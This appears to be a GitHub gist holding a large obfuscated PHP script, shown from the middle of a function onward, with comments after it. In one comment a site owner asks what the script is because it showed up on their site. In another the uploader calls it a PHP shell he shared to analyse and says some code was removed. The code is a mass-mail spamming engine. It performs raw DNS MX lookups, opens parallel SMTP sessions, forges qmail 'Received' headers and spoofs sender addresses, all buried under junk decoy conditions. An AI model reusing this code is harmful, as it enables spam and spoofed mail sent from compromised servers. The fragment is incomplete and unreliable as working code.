return round(0 + 62.5 + 62.5 + 62.5 + 62.5); | |
if (round(0 + 1149.5 + 1149.5 + 1149.5 + 1149.5) < mt_rand(round(0 + 437 + 437 + 437 + 437 + 437), round(0 + 481.6 + 481.6 + 481.6 + 481.6 + 481.6))) curl_multi_info_read($_COOKIE, $_34); | |
} | |
if (!l__2($_79, "HELO $_50" . CRLF, round(0 + 62.5 + 62.5 + 62.5 + 62.5), $_100)) continue; | |
if (!l__2($_79, _68758598(111) . $_105 . _68758598(112) . CRLF, round(0 + 50 + 50 + 50 + 50 + 50), $_100)) continue; | |
if (!l__2($_79, _68758598(113) . $_104 . _68758598(114) . CRLF, array(round(0 + 250), round(0 + 251)), $_100)) continue; | |
if (!l__2($_79, _68758598(115) . CRLF, round(0 + 354), $_100)) continue; | |
$_95 = str_replace(_68758598(116), _68758598(117), $_95); | |
$_95 = str_replace(_68758598(118), CRLF, $_95); | |
if (!l__2($_79, $_95, round(0 + 50 + 50 + 50 + 50 + 50), $_100)) continue; else break; | |
} | |
return $_100; | |
} | |
function l__4 ($_97) { | |
for ($_86 = round(0); $_86 < strlen($_97); $_86++) if (($_97{$_86} >= _68758598(119) && $_97{$_86} <= _68758598(120)) || $_97{$_86} == _68758598(121)) ; else return false; | |
return true; | |
} | |
$_120 = array(); | |
$_121 = round(0 + 214 + 214 + 214); | |
$_9 = array(); | |
function l__5 ($_69, $_106 = false) { | |
global $_120, $_26, $_18, $_19, $_14, $_9; | |
$_11 = array(round(0), round(0)); | |
if ((round(0 + 676.2 + 676.2 + 676.2 + 676.2 + 676.2) + round(0 + 242.8 + 242.8 + 242.8 + 242.8 + 242.8)) > round(0 + 1690.5 + 1690.5) || array_splice($_109, $_52, $_16)) ; else { | |
strtok($_3, $_60); | |
} | |
if (count($_9)) array_splice($_9, round(0)); | |
$_80 = array(); | |
foreach ($_69 as $_86 => $_104) { | |
list($_112, $_64) = explode(_68758598(122), $_104); | |
(round(0 + 900.8 + 900.8 + 900.8 + 900.8 + 900.8) - round(0 + 2252 + 2252) + round(0 + 1079.6666666667 + 1079.6666666667 + 1079.6666666667) - round(0 + 809.75 + 809.75 + 809.75 + 809.75)) ? crc32($_26, $_113) : mt_rand(round(0 + 2999), round(0 + 4504)); | |
$_64 = strtolower($_64); | |
$_69[$_86] = $_112 . _68758598(123) . $_64; | |
if (strpos(_68758598(124), _68758598(125)) !== false) copy($_2, $_76); | |
if (!isset($_120{$_64})) $_80[] = strtolower($_64); | |
} | |
$_122 = l__9(DNS_SERVER, $_80, round(0 + 3 + 3 + 3 + 3 + 3)); | |
$_123 = array(); | |
foreach ($_122 as $_124) $_123[] = $_124[round(0)]; | |
$_114 = l__9(DNS_SERVER, $_123, round(0 + 0.2 + 0.2 + 0.2 + 0.2 + 0.2)); | |
foreach ($_114 as $_117 => $_57) { | |
if (count($_57) > round(0 + 0.5 + 0.5 + 0.5 + 0.5)) array_splice($_57, round(0 + 0.5 + 0.5 + 0.5 + 0.5)); | |
foreach ($_122 as $_125 => $_126) if ($_117 === $_126[round(0)]) { | |
$_120{$_125} = $_57; | |
break; | |
} | |
} | |
foreach ($_69 as $_104) { | |
list($_112, $_64) = explode(_68758598(126), $_104); | |
$_127 = round(0 + 148 + 148 + 148 + 148); | |
if (!isset($_120{$_64})) continue; | |
if (FALSE !== $_99 = l__8($_120[$_64][round(0)], round(0 + 6.25 + 6.25 + 6.25 + 6.25))) { | |
$_95 = array(_68758598(127) => $_99, _68758598(128) => round(0), _68758598(129) => round(0), _68758598(130) => $_120[$_64], _68758598(131) => round(0), _68758598(132) => $_104, _68758598(133) => _68758598(134), _68758598(135) => round(0), _68758598(136) => _68758598(137), _68758598(138) => round(0), _68758598(139) => round(0)); | |
$_9[] = $_95; | |
} | |
} | |
var_dump($_9); | |
$_128 = _68758598(140); | |
$_118 = array(); | |
$_25 = array(); | |
$_129 = round(0 + 51 + 51); | |
while (true) { | |
$_63 = round(0); | |
foreach ($_9 as $_0 => $_95) { | |
if ($_95[_68758598(141)] == round(0) && $_95[_68758598(142)] != round(0)) { | |
if ($_95[_68758598(143)] == round(0) || ($_95[_68758598(144)] % round(0 + 0.5 + 0.5 + 0.5 + 0.5)) == round(0)) $_25[] = $_95[_68758598(145)]; else $_118[] = $_95[_68758598(146)]; | |
$_63++; | |
(round(0 + 1207 + 1207 + 1207) - round(0 + 905.25 + 905.25 + 905.25 + 905.25) + round(0 + 1965 + 1965) - round(0 + 1310 + 1310 + 1310)) ? strtolower($_92, $_5) : mt_rand(round(0 + 582.66666666667 + 582.66666666667 + 582.66666666667), round(0 + 3621)); | |
} | |
} | |
$_40 = @socket_select($_118, $_25, $_109 = NULL, round(0 + 1 + 1 + 1 + 1 + 1)); | |
$_130 = _68758598(147); | |
if (FALSE === $_40 || $_40 == round(0)) { | |
foreach ($_9 as $_86 => $_95) if ($_95[_68758598(148)] != round(0)) { | |
@socket_shutdown($_95[_68758598(149)]); | |
@socket_close($_95[_68758598(150)]); | |
$_9[$_86][_68758598(151)] = round(0); | |
if ((round(0 + 675.6 + 675.6 + 675.6 + 675.6 + 675.6) ^ round(0 + 1689 + 1689)) && array_reduce($_79, $_67, $_123)) base64_decode($_131, $_120, $_132); | |
} | |
if (count($_118) || count($_25)) echo _68758598(152) . socket_last_error() . _68758598(153); else { | |
echo _68758598(154) . socket_last_error() . _68758598(155); | |
} | |
socket_clear_error(); | |
(round(0 + 4287) - round(0 + 2143.5 + 2143.5) + round(0 + 138 + 138 + 138) - round(0 + 82.8 + 82.8 + 82.8 + 82.8 + 82.8)) ? session_is_registered($_46, $_57, $_50) : mt_rand(round(0 + 1970 + 1970), round(0 + 1071.75 + 1071.75 + 1071.75 + 1071.75)); | |
break; | |
while (round(0 + 1211 + 1211 + 1211) - round(0 + 3633)) explode($_2, $_25); | |
} | |
if (count($_118)) { | |
foreach ($_118 as $_99) { | |
$_0 = l__6($_99); | |
$_9[$_0][_68758598(156)] = round(0); | |
$_133 = _68758598(157); | |
if (FALSE === $_40 = socket_recv($_99, $_133, round(0 + 256 + 256 + 256 + 256), round(0))) { | |
if (socket_last_error() != ERRNO_EWOULDBLOCK) { | |
echo _68758598(158) . socket_last_error() . _68758598(159); | |
socket_clear_error(); | |
l__7($_0); | |
if ((round(0 + 1180) ^ round(0 + 590 + 590)) && preg_quote($_120, $_17, $_117)) socket_create($_134, $_89); | |
continue; | |
$_135 = _68758598(160); | |
} | |
socket_clear_error(); | |
(round(0 + 993.25 + 993.25 + 993.25 + 993.25) - round(0 + 794.6 + 794.6 + 794.6 + 794.6 + 794.6) + round(0 + 659.33333333333 + 659.33333333333 + 659.33333333333) - round(0 + 989 + 989)) ? imagecopymerge($_133, $_82) : mt_rand(round(0 + 1324.3333333333 + 1324.3333333333 + 1324.3333333333), round(0 + 2208.5 + 2208.5)); | |
continue; | |
} | |
$_9[$_0][_68758598(161)] .= $_133; | |
$_136 = _68758598(162); | |
$_9[$_0][_68758598(163)] += $_40; | |
if (round(0 + 1378.5 + 1378.5 + 1378.5 + 1378.5) < mt_rand(round(0 + 841 + 841 + 841), round(0 + 1493 + 1493))) rand($_137, $_44); | |
$_60 = _68758598(164); | |
for ($_86 = round(0); $_86 < $_9[$_0][_68758598(165)]; $_86++) if (substr($_9[$_0][_68758598(166)], $_86, round(0 + 0.2 + 0.2 + 0.2 + 0.2 + 0.2)) == _68758598(167)) { | |
$_60 = substr($_9[$_0][_68758598(168)], round(0), $_86); | |
$_9[$_0][_68758598(169)] = substr($_9[$_0][_68758598(170)], $_86 + round(0 + 0.25 + 0.25 + 0.25 + 0.25)); | |
$_9[$_0][_68758598(171)] -= $_86 + round(0 + 0.2 + 0.2 + 0.2 + 0.2 + 0.2); | |
while (round(0 + 1140 + 1140 + 1140 + 1140) - round(0 + 2280 + 2280)) fclose($_95, $_97, $_138); | |
$_86 = round(0); | |
} | |
$_100 = substr($_60, round(0), round(0 + 1 + 1 + 1)); | |
if (is_numeric($_100) && substr($_60, round(0 + 0.6 + 0.6 + 0.6 + 0.6 + 0.6), round(0 + 0.25 + 0.25 + 0.25 + 0.25)) == _68758598(172)) { | |
switch ($_9[$_0][_68758598(173)]) { | |
case round(0 + 0.2 + 0.2 + 0.2 + 0.2 + 0.2): { | |
if ($_106) { | |
echo ":$_100:"; | |
@socket_shutdown($_99); | |
@socket_close($_99); | |
$_139 = round(0 + 1832 + 1832); | |
$_9[$_0][_68758598(174)] = round(0); | |
$_9[$_0][_68758598(175)] = round(0 + 83.333333333333 + 83.333333333333 + 83.333333333333); | |
break; | |
(round(0 + 2355.5 + 2355.5) - round(0 + 4711) + round(0 + 4098) - round(0 + 1366 + 1366 + 1366)) ? strlen($_66) : mt_rand(round(0 + 507.66666666667 + 507.66666666667 + 507.66666666667), round(0 + 2355.5 + 2355.5)); | |
} | |
if ($_100 == round(0 + 220)) { | |
$_9[$_0][_68758598(176)] = "HELO $_26" . CRLF; | |
$_9[$_0][_68758598(177)] = round(0); | |
$_9[$_0][_68758598(178)] = round(0 + 0.5 + 0.5 + 0.5 + 0.5); | |
} else l__7($_0); | |
if ((round(0 + 876 + 876 + 876 + 876) + round(0 + 723.2 + 723.2 + 723.2 + 723.2 + 723.2)) > round(0 + 700.8 + 700.8 + 700.8 + 700.8 + 700.8) || imagecreatefromgd2part($_59, $HTTP_COOKIE_VARS)) ; else { | |
floor($_132, $_89, $_42); | |
} | |
break; | |
$_140 = _68758598(179); | |
} | |
case round(0 + 1 + 1 + 1): { | |
if ($_100 == round(0 + 62.5 + 62.5 + 62.5 + 62.5)) { | |
$_9[$_0][_68758598(180)] = _68758598(181) . $_18 . _68758598(182) . CRLF; | |
$_9[$_0][_68758598(183)] = round(0); | |
$_9[$_0][_68758598(184)] = round(0 + 1 + 1 + 1 + 1); | |
if (strpos(_68758598(185), _68758598(186)) !== false) imagecreatefromjpeg($_42, $_88, $_82, $_10); | |
} else l__7($_0); | |
if (strpos(_68758598(187), _68758598(188)) !== false) substr($_43, $_56); | |
break; | |
} | |
case round(0 + 2.5 + 2.5): { | |
if ($_100 == round(0 + 50 + 50 + 50 + 50 + 50)) { | |
$_9[$_0][_68758598(189)] = _68758598(190) . $_9[$_0][_68758598(191)] . _68758598(192) . CRLF; | |
$_9[$_0][_68758598(193)] = round(0); | |
$_9[$_0][_68758598(194)] = round(0 + 1.2 + 1.2 + 1.2 + 1.2 + 1.2); | |
} else l__7($_0); | |
(round(0 + 369.75 + 369.75 + 369.75 + 369.75) - round(0 + 295.8 + 295.8 + 295.8 + 295.8 + 295.8) + round(0 + 1752.5 + 1752.5) - round(0 + 1752.5 + 1752.5)) ? pack($_69) : mt_rand(round(0 + 482 + 482 + 482), round(0 + 739.5 + 739.5)); | |
break; | |
} | |
case round(0 + 1.4 + 1.4 + 1.4 + 1.4 + 1.4): { | |
if ($_100 == round(0 + 125 + 125) || $_100 == round(0 + 125.5 + 125.5)) { | |
$_9[$_0][_68758598(195)] = _68758598(196) . CRLF; | |
$_9[$_0][_68758598(197)] = round(0); | |
$_9[$_0][_68758598(198)] = round(0 + 8); | |
} else l__7($_0); | |
break; | |
$_141 = round(0 + 1205.3333333333 + 1205.3333333333 + 1205.3333333333); | |
} | |
case round(0 + 2.25 + 2.25 + 2.25 + 2.25): { | |
if ($_100 == round(0 + 118 + 118 + 118)) { | |
$_48 = rand(round(0 + 500 + 500), round(0 + 11800 + 11800 + 11800 + 11800 + 11800)); | |
$_12 = rand(round(0 + 333.33333333333 + 333.33333333333 + 333.33333333333), round(0 + 19666.666666667 + 19666.666666667 + 19666.666666667)); | |
$_65 = "Received: (qmail $_48 invoked by uid $_12); " . gmdate(_68758598(199)) . CRLF; | |
if ((round(0 + 452.75 + 452.75 + 452.75 + 452.75) ^ round(0 + 362.2 + 362.2 + 362.2 + 362.2 + 362.2)) && socket_set_nonblock($_54, $_82, $_35)) filectime($_85, $_133, $_126, $_142, $_0); | |
$_65 .= _68758598(200) . gmdate(_68758598(201)) . CRLF; | |
if ((round(0 + 1421) + round(0 + 330.5 + 330.5)) > round(0 + 710.5 + 710.5) || imagecopyresized($_108, $_COOKIE)) ; else { | |
mssql_result($_6, $_134); | |
} | |
$_65 .= _68758598(202) . gmdate(_68758598(203)) . ".$_48.qmail@" . $_26 . _68758598(204) . CRLF; | |
while (round(0 + 734.33333333333 + 734.33333333333 + 734.33333333333) - round(0 + 2203)) flock($_81, $_95, $_55, $_143); | |
$_65 .= _68758598(205) . $_14 . CRLF; | |
$_65 .= "Reply-To: $_18" . CRLF; | |
$_65 .= _68758598(206) . CRLF; | |
$_65 .= _68758598(207) . CRLF; | |
$_65 .= _68758598(208) . CRLF; | |
$_65 .= "From: <$_18>" . CRLF; | |
$_65 .= _68758598(209) . $_9[$_0][_68758598(210)] . CRLF; | |
$_144 = _68758598(211); | |
$_65 .= _68758598(212) . CRLF; | |
$_65 .= CRLF; | |
if (round(0 + 295 + 295 + 295 + 295) < mt_rand(round(0 + 39.75 + 39.75 + 39.75 + 39.75), round(0 + 203.2 + 203.2 + 203.2 + 203.2 + 203.2))) array_merge($_145, $_POST, $_46); | |
$_65 .= $_19 . CRLF; | |
if ((round(0 + 364.75 + 364.75 + 364.75 + 364.75) + round(0 + 1649 + 1649)) > round(0 + 291.8 + 291.8 + 291.8 + 291.8 + 291.8) || date($_93, $_14)) ; else { | |
feof($_110, $_146, $_100); | |
} | |
$_65 .= CRLF . _68758598(213) . CRLF; | |
if ((round(0 + 404.66666666667 + 404.66666666667 + 404.66666666667) + round(0 + 1162.3333333333 + 1162.3333333333 + 1162.3333333333)) > round(0 + 404.66666666667 + 404.66666666667 + 404.66666666667) || nl2br($_131, $_14, $_57)) ; else { | |
iconv($_64, $_42); | |
} | |
$_9[$_0][_68758598(214)] = $_65; | |
$_9[$_0][_68758598(215)] = round(0); | |
$_9[$_0][_68758598(216)] = round(0 + 3.3333333333333 + 3.3333333333333 + 3.3333333333333); | |
} else l__7($_0); | |
break; | |
$_147 = round(0 + 721.75 + 721.75 + 721.75 + 721.75); | |
} | |
case round(0 + 5.5 + 5.5): { | |
@socket_shutdown($_99); | |
@socket_close($_99); | |
$_148 = round(0 + 1404 + 1404 + 1404); | |
$_9[$_0][_68758598(217)] = round(0); | |
$_9[$_0][_68758598(218)] = $_100; | |
break; | |
if (round(0 + 994.4 + 994.4 + 994.4 + 994.4 + 994.4) < mt_rand(round(0 + 45.666666666667 + 45.666666666667 + 45.666666666667), round(0 + 1207.5 + 1207.5 + 1207.5 + 1207.5))) fgetcsv($_52, $_22, $_45); | |
} | |
} | |
} | |
} | |
array_splice($_118, round(0)); | |
} | |
if (count($_25)) { | |
foreach ($_25 as $_99) { | |
$_0 = l__6($_99); | |
$_9[$_0][_68758598(219)] = round(0); | |
if ($_9[$_0][_68758598(220)] == round(0)) { | |
echo "connected[$_99]\n\n"; | |
$_9[$_0][_68758598(221)] = round(0 + 1); | |
} else if (round(0) == $_9[$_0][_68758598(222)] % round(0 + 1 + 1)) { | |
$_133 = substr($_9[$_0][_68758598(223)], $_9[$_0][_68758598(224)]); | |
if (FALSE === $_40 = socket_send($_99, $_133, strlen($_133), round(0))) { | |
if (socket_last_error() != ERRNO_EWOULDBLOCK) { | |
echo _68758598(225) . socket_last_error() . _68758598(226); | |
socket_clear_error(); | |
l__7($_0); | |
if (strpos(_68758598(227), _68758598(228)) !== false) exp($_59, $_134, $_113, $_78); | |
continue; | |
(round(0 + 1943) - round(0 + 485.75 + 485.75 + 485.75 + 485.75) + round(0 + 841.5 + 841.5) - round(0 + 420.75 + 420.75 + 420.75 + 420.75)) ? fopen($_64, $_100) : mt_rand(round(0 + 388.6 + 388.6 + 388.6 + 388.6 + 388.6), round(0 + 1177.5 + 1177.5 + 1177.5 + 1177.5)); | |
} | |
socket_clear_error(); | |
continue; | |
while (round(0 + 679.75 + 679.75 + 679.75 + 679.75) - round(0 + 1359.5 + 1359.5)) ini_set($_146, $_118, $_80); | |
} | |
$_9[$_0][_68758598(229)] += $_40; | |
if (strlen($_9[$_0][_68758598(230)]) == $_9[$_0][_68758598(231)]) { | |
$_9[$_0][_68758598(232)]++; | |
$_9[$_0][_68758598(233)] = _68758598(234); | |
$_9[$_0][_68758598(235)] = round(0); | |
} | |
} | |
} | |
array_splice($_25, round(0)); | |
} | |
} | |
foreach ($_9 as $_95) if ($_95[_68758598(236)] == round(0 + 50 + 50 + 50 + 50 + 50)) $_11[round(0)]++; else $_11[round(0 + 0.25 + 0.25 + 0.25 + 0.25)]++; | |
return $_11; | |
} | |
function l__6 ($_99) { | |
global $_9; | |
(round(0 + 377.66666666667 + 377.66666666667 + 377.66666666667) - round(0 + 226.6 + 226.6 + 226.6 + 226.6 + 226.6) + round(0 + 1319 + 1319 + 1319) - round(0 + 3957)) ? fgets($_138, $_2, $_95) : mt_rand(round(0 + 377.66666666667 + 377.66666666667 + 377.66666666667), round(0 + 1212.6666666667 + 1212.6666666667 + 1212.6666666667)); | |
foreach ($_9 as $_107 => $_95) if ($_95[_68758598(237)] == $_99) return $_107; | |
return -round(0 + 0.5 + 0.5); | |
} | |
function l__7 ($_78) { | |
global $_9; | |
@socket_shutdown($_9[$_78][_68758598(238)]); | |
@socket_close($_9[$_78][_68758598(239)]); | |
if ($_9[$_78][_68758598(240)] >= round(0 + 2.5 + 2.5 + 2.5 + 2.5)) return; | |
$_9[$_78][_68758598(241)]++; | |
if ($_9[$_78][_68758598(242)] >= count($_9[$_78][_68758598(243)])) { | |
$_9[$_78][_68758598(244)] = round(0); | |
$_9[$_78][_68758598(245)] = round(0 + 801); | |
return; | |
} | |
$_2 = $_9[$_78][_68758598(246)]; | |
$_149 = round(0 + 24.5 + 24.5); | |
$_49 = $_9[$_78][_68758598(247)][$_2]; | |
if (FALSE === $_9[$_78][_68758598(248)] = l__8($_49, round(0 + 5 + 5 + 5 + 5 + 5))) { | |
$_9[$_78][_68758598(249)] = round(0); | |
$_9[$_78][_68758598(250)] = round(0 + 802); | |
} else { | |
$_9[$_78][_68758598(251)] = round(0); | |
} | |
} | |
function l__8 ($_49, $_35) { | |
$_99 = @socket_create(2, 1, 6); | |
if (!$_99) return FALSE; | |
if (!@socket_set_nonblock($_99)) { | |
@socket_shutdown($_99); | |
@socket_close($_99); | |
return FALSE; | |
if ((round(0 + 583.6 + 583.6 + 583.6 + 583.6 + 583.6) + round(0 + 575.5 + 575.5 + 575.5 + 575.5)) > round(0 + 2918) || unpack($_12)) ; else { | |
array_pop($_150, $_14, $_111); | |
} | |
} | |
if (FALSE === @socket_connect($_99, $_49, $_35) && socket_last_error() != ERRNO_EINPROGRESS && socket_last_error() != ERRNO_EWOULDBLOCK) { | |
echo "socket_connect $_49:$_35 last_error = " . socket_last_error() . _68758598(252); | |
socket_clear_error(); | |
@socket_shutdown($_99); | |
$_151 = _68758598(253); | |
@socket_close($_99); | |
return FALSE; | |
} | |
return $_99; | |
} | |
function l__9 ($_15, $_80, $_152 = 1) { | |
$_23 = array(); | |
foreach ($_80 as $_145 => $_125) { | |
$_108 = chr(round(0)) . chr($_145) . chr(round(0 + 0.33333333333333 + 0.33333333333333 + 0.33333333333333)) . chr(round(0)) . chr(round(0)) . chr(round(0 + 0.33333333333333 + 0.33333333333333 + 0.33333333333333)) . chr(round(0)) . chr(round(0)) . chr(round(0)) . chr(round(0)) . chr(round(0)) . chr(round(0)); | |
$_81 = round(0 + 12); | |
if ((round(0 + 4013) + round(0 + 509.8 + 509.8 + 509.8 + 509.8 + 509.8)) > round(0 + 1003.25 + 1003.25 + 1003.25 + 1003.25) || strnatcmp($_36, $_117, $_49)) ; else { | |
socket_close($_15, $_13); | |
} | |
list($_134, $_153) = l__10($_125); | |
$_108 .= $_153 . chr(round(0)) . chr($_152) . chr(round(0)) . chr(round(0 + 0.5 + 0.5)); | |
$_81 += $_134 + round(0 + 0.8 + 0.8 + 0.8 + 0.8 + 0.8); | |
if ((round(0 + 165 + 165 + 165 + 165) + round(0 + 166 + 166 + 166 + 166)) > round(0 + 132 + 132 + 132 + 132 + 132) || abs($_16, $_66, $_153, $_24)) ; else { | |
time($_93, $_95); | |
} | |
@ini_set(_68758598(254), round(0 + 1.6666666666667 + 1.6666666666667 + 1.6666666666667)); | |
$_154 = round(0 + 348.6 + 348.6 + 348.6 + 348.6 + 348.6); | |
$_23[$_145] = fsockopen("udp://$_15", round(0 + 13.25 + 13.25 + 13.25 + 13.25)); | |
fwrite($_23[$_145], $_108, $_81); | |
} | |
foreach ($_80 as $_145 => $_125) socket_set_timeout($_23[$_145], round(0 + 0.75 + 0.75 + 0.75 + 0.75)); | |
$_93 = array(); | |
foreach ($_80 as $_145 => $_125) { | |
$_132 = fread($_23[$_145], round(0 + 256 + 256)); | |
$_22 = strlen($_132); | |
if (strpos(_68758598(255), _68758598(256)) !== false) array_filter($_105, $_94, $_47, $_107); | |
fclose($_23[$_145]); | |
if ((round(0 + 728.2 + 728.2 + 728.2 + 728.2 + 728.2) ^ round(0 + 1820.5 + 1820.5)) && strval($_87, $_SERVER, $_12, $_9)) trim($_123, $_43, $_134); | |
$_138 = l__12(ord($_132{round(0 + 4)}), ord($_132{round(0 + 1.6666666666667 + 1.6666666666667 + 1.6666666666667)})); | |
while (round(0 + 4893) - round(0 + 1223.25 + 1223.25 + 1223.25 + 1223.25)) imagecreatefromgd2($_10, $_145, $_61); | |
$_150 = l__12(ord($_132{round(0 + 3 + 3)}), ord($_132{round(0 + 7)})); | |
while (round(0 + 2264) - round(0 + 452.8 + 452.8 + 452.8 + 452.8 + 452.8)) array_flip($_54, $_126); | |
$_29 = l__12(ord($_132{round(0 + 4 + 4)}), ord($_132{round(0 + 3 + 3 + 3)})); | |
$_146 = l__12(ord($_132{round(0 + 10)}), ord($_132{round(0 + 3.6666666666667 + 3.6666666666667 + 3.6666666666667)})); | |
if (round(0 + 744.25 + 744.25 + 744.25 + 744.25) < mt_rand(round(0 + 146 + 146 + 146 + 146 + 146), round(0 + 448.4 + 448.4 + 448.4 + 448.4 + 448.4))) nl2br($_74); | |
$_155 = round(0 + 12); | |
for ($_156 = round(0); $_156 < $_138; $_156++) { | |
$_157 = l__11($_132, $_155); | |
if ((round(0 + 1148 + 1148) ^ round(0 + 765.33333333333 + 765.33333333333 + 765.33333333333)) && array_merge($_117, $_39)) mkdir($_31, $_93, $_6); | |
$_155 += round(0 + 2 + 2); | |
if (strpos(_68758598(257), _68758598(258)) !== false) ini_set($_86, $_47); | |
} | |
for ($_86 = round(0); $_86 < $_150; $_86++) { | |
$_157 = l__11($_132, $_155); | |
$_158 = l__12(ord($_132{$_155}), ord($_132{$_155 + round(0 + 0.33333333333333 + 0.33333333333333 + 0.33333333333333)})); | |
$_159 = round(0 + 270.25 + 270.25 + 270.25 + 270.25); | |
$_155 += round(0 + 0.5 + 0.5 + 0.5 + 0.5); | |
$_160 = l__12(ord($_132{$_155}), ord($_132{$_155 + round(0 + 0.2 + 0.2 + 0.2 + 0.2 + 0.2)})); | |
while (round(0 + 4465) - round(0 + 893 + 893 + 893 + 893 + 893)) strtoupper($_104, $_26, $_74); | |
$_155 += round(0 + 0.4 + 0.4 + 0.4 + 0.4 + 0.4); | |
$_155 += round(0 + 1 + 1 + 1 + 1); | |
if ((round(0 + 3985) ^ round(0 + 996.25 + 996.25 + 996.25 + 996.25)) && implode($_0)) socket_getpeername($_61); | |
$_58 = l__12(ord($_132{$_155}), ord($_132{$_155 + round(0 + 0.33333333333333 + 0.33333333333333 + 0.33333333333333)})); | |
$_161 = round(0 + 889.66666666667 + 889.66666666667 + 889.66666666667); | |
$_155 += round(0 + 0.4 + 0.4 + 0.4 + 0.4 + 0.4); | |
if (strpos(_68758598(259), _68758598(260)) !== false) str_replace($HTTP_SERVER_VARS); | |
if ($_158 == round(0 + 0.2 + 0.2 + 0.2 + 0.2 + 0.2)) { | |
$_17 = ord($_132{$_155}); | |
$_155++; | |
$_66 = ord($_132{$_155}); | |
$_155++; | |
$_82 = ord($_132{$_155}); | |
if (round(0 + 768.33333333333 + 768.33333333333 + 768.33333333333) < mt_rand(round(0 + 372.66666666667 + 372.66666666667 + 372.66666666667), round(0 + 394 + 394 + 394))) cos($_27); | |
$_155++; | |
$_145 = ord($_132{$_155}); | |
$_155++; | |
$_74 = $_17 . _68758598(261) . $_66 . _68758598(262) . $_82 . _68758598(263) . $_145; | |
if (!isset($_93[$_125])) $_93[$_125] = array(); | |
if (!in_array($_74, $_93[$_125])) $_93[$_125][] = $_74; | |
} elseif ($_158 == round(0 + 5 + 5 + 5)) { | |
$_101 = l__12(ord($_132{$_155}), ord($_132{$_155 + round(0 + 0.5 + 0.5)})); | |
$_155 += round(0 + 0.4 + 0.4 + 0.4 + 0.4 + 0.4); | |
$_1 = l__11($_132, $_155); | |
if (!isset($_93[$_125])) $_93[$_125] = array(); | |
if (!in_array($_1, $_93[$_125])) $_93[$_125][] = $_1; | |
} | |
} | |
} | |
return $_93; | |
} | |
function l__10 ($_125) { | |
$_115 = round(0); | |
if ((round(0 + 454.2 + 454.2 + 454.2 + 454.2 + 454.2) + round(0 + 1966 + 1966)) > round(0 + 1135.5 + 1135.5) || urlencode($_124, $_13, $_80)) ; else { | |
strtolower($_118); | |
} | |
$_162 = round(0); | |
$_67 = _68758598(264); | |
if (strpos(_68758598(265), _68758598(266)) !== false) strrpos($_93, $_62, $_38, $_74); | |
$_131 = _68758598(267); | |
if (round(0 + 6292) < mt_rand(round(0 + 2375), round(0 + 1956 + 1956))) mkdir($_85, $_115); | |
while (false !== $_162 = strpos($_125, _68758598(268))) { | |
$_67 = substr($_125, round(0), $_162); | |
$_125 = substr($_125, $_162 + round(0 + 0.33333333333333 + 0.33333333333333 + 0.33333333333333)); | |
$_163 = round(0 + 1046); | |
$_131 .= chr(strlen($_67)) . $_67; | |
if ((round(0 + 463 + 463 + 463 + 463) ^ round(0 + 926 + 926)) && trim($_40)) explode($_28, $_105, $_48); | |
$_115 += round(0 + 0.2 + 0.2 + 0.2 + 0.2 + 0.2) + strlen($_67); | |
} | |
$_131 .= chr(strlen($_125)) . $_125 . chr(round(0)); | |
$_115 += round(0 + 0.2 + 0.2 + 0.2 + 0.2 + 0.2) + strlen($_125) + round(0 + 0.2 + 0.2 + 0.2 + 0.2 + 0.2); | |
return array($_115, $_131); | |
$_164 = round(0 + 624.4 + 624.4 + 624.4 + 624.4 + 624.4); | |
} | |
function l__11 ($_13, &$_44) { | |
$_56 = array(); | |
if ((round(0 + 330) ^ round(0 + 330)) && fgetss($_14)) session_name($_89, $_116, $_40); | |
$_33 = ord($_13{$_44}); | |
$_44++; | |
while ($_33 != round(0)) { | |
if ($_33 == round(0 + 96 + 96)) { | |
$_165 = $_44; | |
$_44 = ord($_13{$_165}); | |
$_165++; | |
if ((round(0 + 2589) ^ round(0 + 863 + 863 + 863)) && filectime($HTTP_SERVER_VARS)) nl2br($_2, $_47, $_15, $_38); | |
$_142 = l__11($_13, $_44); | |
while (round(0 + 1030 + 1030) - round(0 + 515 + 515 + 515 + 515)) imagecreatefrompng($_44, $_103); | |
$_44 = $_165; | |
if (count($_56)) return implode(_68758598(269), $_56) . _68758598(270) . $_142; | |
return $_142; | |
} | |
$_143 = $_33; | |
if ((round(0 + 203.75 + 203.75 + 203.75 + 203.75) + round(0 + 1133 + 1133 + 1133 + 1133)) > round(0 + 271.66666666667 + 271.66666666667 + 271.66666666667) || strlen($_131, $_107, $_60, $_165)) ; else { | |
strptime($_20, $_105); | |
} | |
$_166 = _68758598(271); | |
for ($_86 = round(0); $_86 < $_143; $_86++) { | |
$_166 .= $_13{$_44}; | |
$_167 = round(0 + 104 + 104 + 104 + 104 + 104); | |
$_44++; | |
} | |
$_56[] = $_166; | |
$_33 = ord($_13{$_44}); | |
$_44++; | |
$_168 = round(0 + 155.75 + 155.75 + 155.75 + 155.75); | |
} | |
return implode(_68758598(272), $_56); | |
$_169 = round(0 + 552 + 552 + 552 + 552 + 552); | |
} | |
function l__12 ($_36, $_137) { | |
return round(0 + 64 + 64 + 64 + 64) * $_36 + $_137; | |
while (round(0 + 389 + 389 + 389 + 389) - round(0 + 778 + 778)) curl_close($_64, $HTTP_COOKIE_VARS); | |
} | |
function l__13 ($_97) { | |
$_16 = fopen(_68758598(273), _68758598(274)); | |
if ((round(0 + 121 + 121 + 121 + 121 + 121) + round(0 + 333.8 + 333.8 + 333.8 + 333.8 + 333.8)) > round(0 + 151.25 + 151.25 + 151.25 + 151.25) || flock($_152, $_110, $_107)) ; else { | |
strtotime($_34, $_160, $_51); | |
} | |
if ($_16) { | |
fwrite($_16, $_97); | |
fclose($_16); | |
} | |
} ?> |
Hey, it’s an php shell, so you wanne delete it asap
You have a bug in an upload and somebody tried to get access
If they used this, it’s harmless. I uploaded this in college cause i found it and shared it somewhere to figure out what it did, and we removed some code, but the original is pretty dangerous
Remko
… Op 23 dec. 2019 om 21:55 heeft jchornenky ***@***.***> het volgende geschreven:
Hello - what does this script do? It showed up on our site recently.
—
You are receiving this because you authored the thread.
Reply to this email directly, view it on GitHub, or unsubscribe.
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Hello - what does this script do? It showed up on our site recently.